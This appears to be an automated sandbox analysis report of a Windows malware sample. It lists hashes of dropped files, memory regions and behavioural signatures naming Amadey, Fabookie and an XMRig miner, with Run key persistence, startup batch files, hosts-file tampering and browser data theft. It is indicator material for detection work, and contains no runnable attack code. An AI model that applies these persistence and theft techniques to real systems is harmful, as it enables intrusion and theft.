C:\Users\Admin\Pictures\FykH2HsVfDnnj7oZVpqHE25N.exe
| MD5 | 2565bdf6fc65a0c1568391c5b354e4a2 |
| SHA1 | b5a58b0013c0df31f23e9b3b93c8aa15f8ea7502 |
| SHA256 | 5e89d8a9b19c40d194ca85db9d1df408b6771e0343a708de58d4e418f31ab697 |
| SHA512 | 9499f0fbbabcb27ade5a84c4a30acd0143f887c58e6a4b910bae76e8fdc931da3fe821891262a4f4b00486211623047eb0e2a926486f390792f0be5625538449 |
memory/2196-520-0x000000013FEB0000-0x00000001403F3000-memory.dmp
memory/2852-522-0x00000000736F0000-0x0000000073DDE000-memory.dmp
memory/1124-521-0x0000000000400000-0x00000000005C7000-memory.dmp
memory/1124-524-0x0000000061E00000-0x0000000061EF3000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 53b19cc2641b1c402de7b6d80ac2a16b |
| SHA1 | cd83d5684ca2625fe33c8f0709886af64bb8cdb1 |
| SHA256 | 029b122ceb4e1d3cdb076254fcec34793fff64c7f8e282feea04479a17f6ff85 |
| SHA512 | 5465ad3eee8a13b6ed40965038a47b15a458fe408bf0c87958e66a4ac8b9fe4af8528010d48d6c94337420d630ed773cd74dd3bea0f5db11f254c3a69c52973a |
C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
| MD5 | aebaf57299cd368f842cfa98f3b1658c |
| SHA1 | cb4642f3425e8827e54a95c99a4b7aa1ae91d9b7 |
| SHA256 | d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce |
| SHA512 | 989ffc32678ae1505c3fb5befa9c281bfc87e33330bb5a23010a57766c4ce6dadbde86bd2a097ed8ac23195645abc50577dfe69191bb4bccdc77861488f6572e |
memory/1660-585-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Program Files\Common Files\LVNLYGGZHA\lightcleaner.exe
| MD5 | f8c7c7d63fe2d74fa007ace2598ff9cb |
| SHA1 | 23412ed810c3830ca9bab8cd25c61cf7d70d0b5a |
| SHA256 | fd02825ce17effb7d70ca2e9907647128241610bb1dce11a70f6f1a19d052047 |
| SHA512 | 0dfb9bcd6dd8ce3f561b885989ae4c2e78c33f110aa1bf48c4c42c467db672af422ebdbf2ef66fe6f2e21307c036fbfa885e58fc3c4fa1f9677139e818855258 |
C:\Users\Admin\AppData\Local\Temp\24-5c628-abd-15e86-1fb13046e514e\Selotemate.exe.config
| MD5 | 98d2687aec923f98c37f7cda8de0eb19 |
| SHA1 | f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7 |
| SHA256 | 8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465 |
| SHA512 | 95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590 |
C:\Users\Admin\AppData\Local\Temp\24-5c628-abd-15e86-1fb13046e514e\Selotemate.exe
| MD5 | 12b9ea8a702a9737e186f8057c5b4a3a |
| SHA1 | 4184e9decf6bbc584a822098249e905644c4def2 |
| SHA256 | 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001 |
| SHA512 | f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713 |
memory/1660-592-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Program Files\Common Files\LVNLYGGZHA\lightcleaner.exe
| MD5 | f8c7c7d63fe2d74fa007ace2598ff9cb |
| SHA1 | 23412ed810c3830ca9bab8cd25c61cf7d70d0b5a |
| SHA256 | fd02825ce17effb7d70ca2e9907647128241610bb1dce11a70f6f1a19d052047 |
| SHA512 | 0dfb9bcd6dd8ce3f561b885989ae4c2e78c33f110aa1bf48c4c42c467db672af422ebdbf2ef66fe6f2e21307c036fbfa885e58fc3c4fa1f9677139e818855258 |
\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
memory/1928-590-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp
\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 7c3e38d2ad394d59872be4caf1a174e3 |
| SHA1 | 9c96064e48d15bbfc92b7b6ee4d1fc849aa6097e |
| SHA256 | 4dadc912dd5f95056eb5df9a4c1b70f34e503a8c4eeeae760fe9ec779fd7b641 |
| SHA512 | 3054082b43acf6e413a359828e8b687d4d6b233861cb0b2e230914cf13b8c89a85b65b9602404d3a072ddfc89bdc0446179d40d03dea24dec63b89384248f3f9 |
\Users\Admin\AppData\Local\Temp\is-59MQS.tmp\lightcleaner.tmp
| MD5 | 7bf46cc89fa0ea81ece9fc0eb9d38807 |
| SHA1 | 803040acb0d2dda44091c23416586aaeeed04e4a |
| SHA256 | 31793ff8cdff66c5eb829ff1637d12b7afebd5fc95794946baccb6e96bf54649 |
| SHA512 | 371c053ae2e4a0ab530b597c5cb9e07a35b9b391b79afa06b9c7bc3b4c172e8ffbd83aefd931c5eb39c9a4e8c991f74dfff94eb9014be5cb9af3edef7a335d41 |
C:\Users\Admin\AppData\Local\Temp\is-GEKDR.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\070E0202839D9D67350CD2613E78E416
| MD5 | d341408e031f83c564afc718a5b21207 |
| SHA1 | 86c9d7805486bb0496f4c22ca668f78339bf0a27 |
| SHA256 | caad868bfe558cacb39b9b886d2f6a192eb1be8270d4a46d42ce30c8684c183d |
| SHA512 | 3712a7ac84dc3d6c1e92ea45bf04c90e74ae5e658a00894e1f224a53013f269949e757d6c0470eb07c3e0a7aa792142996a00307b62d42c73b140f36aa57d865 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\070E0202839D9D67350CD2613E78E416
| MD5 | 55540a230bdab55187a841cfe1aa1545 |
| SHA1 | 363e4734f757bdeb89868efe94907774a327695e |
| SHA256 | d73494e3446b02167573b3cde3ae1c8584ac26e15e45ac3ec0326708425d90fb |
| SHA512 | c899cb1d31d3214fd9dc8626a55e40580d3b2224bf34310c2abd85d0f63e2dedaeae57832f048c2f500cb2cbf83683fcb14139af3f0b5251606076cdb4689c54 |
C:\Program Files\Google\Chrome\updater.exe
| MD5 | 7af78ecfa55e8aeb8b699076266f7bcf |
| SHA1 | 432c9deb88d92ae86c55de81af26527d7d1af673 |
| SHA256 | f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e |
| SHA512 | 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e |
memory/2196-764-0x000000013FEB0000-0x00000001403F3000-memory.dmp
memory/612-773-0x000000006D850000-0x000000006DDFB000-memory.dmp
memory/2808-786-0x00000000007A0000-0x00000000007A1000-memory.dmp
memory/2852-790-0x0000000005C80000-0x0000000005CC0000-memory.dmp
memory/1928-789-0x000000001AE10000-0x000000001AE90000-memory.dmp
memory/1564-788-0x0000000003240000-0x0000000003371000-memory.dmp
memory/612-785-0x00000000005A0000-0x00000000005E0000-memory.dmp
memory/1928-793-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp
memory/1484-800-0x0000000000400000-0x00000000004BD000-memory.dmp
memory/2148-794-0x00000000026E0000-0x0000000002AD8000-memory.dmp
memory/2852-792-0x0000000005C80000-0x0000000005CC0000-memory.dmp
memory/1484-791-0x0000000000240000-0x0000000000241000-memory.dmp
memory/1664-810-0x0000000000400000-0x0000000000D68000-memory.dmp
memory/2148-809-0x0000000000400000-0x0000000000D68000-memory.dmp
memory/1224-808-0x0000000000400000-0x000000000046A000-memory.dmp
memory/2148-806-0x0000000002AE0000-0x00000000033CB000-memory.dmp
memory/1660-805-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1656-804-0x0000000000400000-0x0000000000513000-memory.dmp
memory/1124-814-0x0000000000400000-0x00000000005C7000-memory.dmp
memory/2560-815-0x0000000000400000-0x0000000000A00000-memory.dmp
memory/1124-813-0x0000000000680000-0x0000000000780000-memory.dmp
memory/1124-812-0x0000000000400000-0x00000000005C7000-memory.dmp
memory/1664-811-0x00000000025B0000-0x00000000029A8000-memory.dmp
C:\ProgramData\Microsoft\Assistance\Client\1.0\es-ES\Help_MValidator.H1D
| MD5 | 12017a05b04d4b1e73b99cf68bd4a7d6 |
| SHA1 | 2444d9181d5e66a6c20e4c6bf56647eb54f6aa70 |
| SHA256 | a1e2dba5d5515e5ec61dcd4aa793bd60cefba0f7f5d5afd8c697d77adbd1dc26 |
| SHA512 | 2e6996a3a5edd2d1ec1bc242fde14509e2afcf2f80ebcfbc6aae570a1021cd913490230cf574859a6727072cfb78b58b0412b44b89e82e014eb214709a86dac5 |
memory/1664-837-0x0000000000400000-0x0000000000D68000-memory.dmp
memory/2560-851-0x0000000002E00000-0x0000000003278000-memory.dmp
memory/2560-852-0x0000000000400000-0x0000000000A00000-memory.dmp
memory/2560-853-0x00000000023B0000-0x0000000002814000-memory.dmp
memory/2560-854-0x0000000002820000-0x0000000002CE7000-memory.dmp
memory/2560-855-0x0000000003690000-0x0000000003E82000-memory.dmp
memory/2560-858-0x00000000002B0000-0x00000000002B1000-memory.dmp
memory/2560-862-0x0000000003F50000-0x0000000004090000-memory.dmp
memory/2560-864-0x0000000000AF0000-0x0000000000AF1000-memory.dmp
memory/2560-865-0x0000000003F50000-0x0000000004090000-memory.dmp
memory/2560-866-0x0000000003F50000-0x0000000004090000-memory.dmp
memory/2560-867-0x0000000000B40000-0x0000000000B41000-memory.dmp
memory/2560-868-0x0000000003F50000-0x0000000004090000-memory.dmp
memory/2560-869-0x0000000003F50000-0x0000000004090000-memory.dmp
memory/2560-870-0x0000000003690000-0x0000000003E82000-memory.dmp
memory/2560-859-0x0000000003F50000-0x0000000004090000-memory.dmp
memory/2560-861-0x0000000003690000-0x0000000003E82000-memory.dmp
memory/2560-873-0x0000000077B90000-0x0000000077B91000-memory.dmp
memory/1312-875-0x0000000001360000-0x00000000018AD000-memory.dmp
memory/2560-874-0x0000000003F50000-0x0000000004090000-memory.dmp
memory/2560-872-0x0000000003F50000-0x0000000004090000-memory.dmp
memory/2560-871-0x0000000000B50000-0x0000000000B51000-memory.dmp
memory/2560-876-0x0000000003F50000-0x0000000004090000-memory.dmp
memory/2560-882-0x0000000003F50000-0x0000000004090000-memory.dmp
memory/612-886-0x00000000005A0000-0x00000000005E0000-memory.dmp
memory/2780-884-0x00000000026A0000-0x0000000002E92000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 3d56a1152c50bd99ae7e94b824c3aa84 |
| SHA1 | f28e9da54c773d595e9f4e6906de7c3618769b07 |
| SHA256 | 8432e210f264d43b04f97972910c6060a0177aa3d2281863ee526c0ff53e28f1 |
| SHA512 | be9eb53438e3d2efab8be1800a105895dd761b0c1dace75b1907ae1608a0415fb070ee307519bcb349dc64ab8f80be3aeb4236a1533ec60072f7940d33c6ac5c |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | 6a6f26abc83252a905f2bbc4bffe4534 |
| SHA1 | 06ad7e53dbd36893ecc3494a2c828504aa9fced7 |
| SHA256 | 1fd1afb620488707c5e453afa2f4b5d33b9330d04882d8f0e8782ee2e39efe07 |
| SHA512 | 5f7b4ada34979e99f6706d3e09bca4f2610e0e0a42cfa019e438f6ac61c74b76f98e1dcab8e54321a0ead7d0a3db167579acb6cff3c7635da04d93b9f576035a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c187a851ce4a049916b279fda5ae9fee |
| SHA1 | 4edb66f4095f8910ef4ca9c869d0fe54c0218320 |
| SHA256 | 996608078048a5ed968813185a6573ef4451e9581adeaa93ee4591ce055410b3 |
| SHA512 | b3129f9d61997484adfaa586c7f33446af9fafeda6d2a6ce77039bbe9bc004cfd313d2d9be3c854b179ef3197949f17d51a64d2c47b099c637bfaf96ff4b4699 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c1f64e0ef258bd41b7d8bbeb3e5c090a |
| SHA1 | ad35259da289ab52ff55a1a5cc6a4be64c49d031 |
| SHA256 | 6f7b571a395636fade125ffc4579c0fa09fa5596cd621b45f703bee14de5f222 |
| SHA512 | e5f3255977fdfe122f970e4f3949adf6cb9e8554876a0c2e6e368789f0903a3768a075eb22ab4055d8394e8baca417fd0a8b3e54d8e3ff4caaf7b05f45f769d4 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | b0171da4293f9d86730c0ce7483cf29c |
| SHA1 | d464280be869bb3730c32bc5ae4ca979802ed1be |
| SHA256 | a3512ba96ac8c2a233b5642a49ce90c80c6b58d3aadcc888294dd3027ad75962 |
| SHA512 | a2878e7a671984d73f6fbe124cd532fde26b41af0815f068b8c5fc3da1dd32ff423dc8d4d48c430b64d27a0f4df8c85c5b64176c3889f5856cd5274e9adb2c63 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | eae46c2ab432a15e03f513708a782051 |
| SHA1 | 5adf32dc8b99f06d2fe1f4e0fd8041ade284b655 |
| SHA256 | 3b399d29ef5f7d9ff775843900b35e2e005caf2d5a67a64ea7f6aad12b51447e |
| SHA512 | 6e0602575dc9073ad42ef6ebd7bfa0ec0b006f7d37125a03487c34dfd76ddda3cb51cea630728605035ec575ffc25ed252b09297fa51fea791439fbea05f398d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | e4a68ac854ac5242460afd72481b2a44 |
| SHA1 | df3c24f9bfd666761b268073fe06d1cc8d4f82a4 |
| SHA256 | cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f |
| SHA512 | 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 6abafa80fdc8f6d30a4cc81905669870 |
| SHA1 | b733ce6d6fc9639cedc3cd55286a859b5f3f3087 |
| SHA256 | e7e47f779fd976b80c5897e2ddc3da4bfad0029e7ef963155220c6e86c50a1af |
| SHA512 | d8828559d7a8e1287cdbbbd7a59b8ebd41978f603696a2d2f216c94d4aed446fb4d86d1544e88fdc733d72b39d9bf11edd6ef7779e9be7c38c51ab35347b8af6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 52598c22f1919f8b69ac1f7a178242c8 |
| SHA1 | 9f606de06971e88c1092bf57da3eab9f053d994d |
| SHA256 | 2d13679e504416e221513f327274f1cf01c718d9c11a900e1d12586161fd01e9 |
| SHA512 | 3a3b421343f0e62479cf0ba977437a3b9fa1ecc53cdac422dedcd6cd36ebddfd8570db550f9bb0e8b0df55bf5924f210f0aa150ae62b33c979d3dc526714ef65 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c27a8d110e37966beceef491129f293d |
| SHA1 | 44ff3cdf91f425c6cab816532456ab0caf570114 |
| SHA256 | 827524d9fdf1c1108601829fd08341b8caa239198f6c284d063e76d877a4645b |
| SHA512 | 524d03a1eff1805501953a1da6c4f96e10d7e93516e8b03a35ac8f7e67672cd906f39f232a0517e77ddc6818c94a6e4a26180abba20de3ea0e081b3991d46c14 |
C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll
| MD5 | 49b3faf5b84f179885b1520ffa3ef3da |
| SHA1 | c1ac12aeca413ec45a4f09aa66f0721b4f80413e |
| SHA256 | b89189d3fca0a41aee9d4582a8efbe820d49e87224c325b4a0f4806d96bf86a5 |
| SHA512 | 018d531b3328267ecaebcb9f523c386c8aa36bf29e7b2e0f61bd96a0f7f2d03c7f25f878c373fbce7e44c8d5512e969b816ed9c72edb44afa302670c652de742 |
C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll
| MD5 | 4bd56443d35c388dbeabd8357c73c67d |
| SHA1 | 26248ce8165b788e2964b89d54d1f1125facf8f9 |
| SHA256 | 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867 |
| SHA512 | 100dc81a0d74725d74ed3801d7828c53c36315179427e88404cb482f83afc0e8766fd86642b4396b37dd7e3262d66d7138c8b4a175354af98254869fbdd43192 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | e3e486300f7a5e60d16da2d54f0ebaab |
| SHA1 | bbfa9149485910b6d4ef6d009e68d8cb811e59ee |
| SHA256 | be9969dddf21bc815b53e61b91c203dd70f70aecc1039b0c22057fb28be0a634 |
| SHA512 | 0705d1262adf09d74ce14c0553dfb9f71e34cdcf393eca999f8ef7ae33a34f746e062749e805dcf90ad56d3bbc0f9840fc845ab14c85e2300ea78bf946433126 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 5fb16cbeb4586fdb0b944cedeef1258f |
| SHA1 | 4b14b8a23c85ae1781682307ed2690110cf1b0e4 |
| SHA256 | d325e39ba1781f964571b110acebfec494fa7860b5111eb17f5c55ec3ce4bdc2 |
| SHA512 | 7b0abcbb84bdf305435e7564c9c31065285ce0ef3df83df1a4a677c5a4708483803bb0af0d91aaa21b27aabc9fbcfad3b1cb933bfb423943e2404910855700bf |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 361c0b8c80e64a74c7c54ac45e55c088 |
| SHA1 | 8aa251164798e8cc8f7bff95bfb55955ab0ddf19 |
| SHA256 | 41f5484b2988e219a7c7fc82a3b5f000e58315a8c9a22259d68ffb9bc7667970 |
| SHA512 | 33d1b3fc91add5c86a3251e4396690bd62c1681f06d6819a97455088fd442c3471fa1686b1fb4502b094b58f3ea8bc5a873155da16ac1c71b40b2b4b3f06360b |
C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | fd2727132edd0b59fa33733daa11d9ef |
| SHA1 | 63e36198d90c4c2b9b09dd6786b82aba5f03d29a |
| SHA256 | 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e |
| SHA512 | 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e |
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PL78BP4I\suggestions[1].en-US
| MD5 | 5a34cb996293fde2cb7a4ac89587393a |
| SHA1 | 3c96c993500690d1a77873cd62bc639b3a10653f |
| SHA256 | c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad |
| SHA512 | e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee |
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | 5da3a881ef991e8010deed799f1a5aaf |
| SHA1 | fea1acea7ed96d7c9788783781e90a2ea48c1a53 |
| SHA256 | f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4 |
| SHA512 | 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09 |
Analysis: behavioral2
Detonation Overview
Submitted
2023-10-04 22:00
Reported
2023-10-04 22:03
Platform
win10v2004-20230915-en
Max time kernel
133s
Max time network
151s
Command Line
Signatures
Amadey
Detect Fabookie payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Fabookie
Suspicious use of NtCreateUserProcessOtherParentProcess
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe | N/A |
Stops running service(s)
.NET Reactor proctector
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Pictures\ZRBeoPgeGj8CxG9qYs8sjAht.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5nEFLhvur3PfnWFfqazVcbhe.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dGIPEz9n7OVcihVvNtfHAic4.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kO1KRPG4oOONnPKyWWQ2An2Q.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pVTXkOiHKAHqCqYAnM2rV6H6.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Kr27Ey1NE3Y5Notxl7fEKGsO.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TZSRnhFzitYjo4TnClmGKisZ.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\onywQULHStPc8A2RYT8Y8uYa.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0uoHVTc55FxRhaUsghlx8u5i.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C6PPl873Avd8oxJhqrrnG8Bj.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XnjZeeJD8ofcRSwPBBC26dmy.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\m2P2rA2RW0F7IB2YG1D51LnQ.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\s6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000042051\\s6.exe" | C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Mozilla Maintenance Service\\Civutisudi.exe\"" | C:\Users\Admin\AppData\Local\Temp\is-SKTLI.tmp\8758677____.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\eszj1FzD5qG7Qoq4NGLteMV8.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
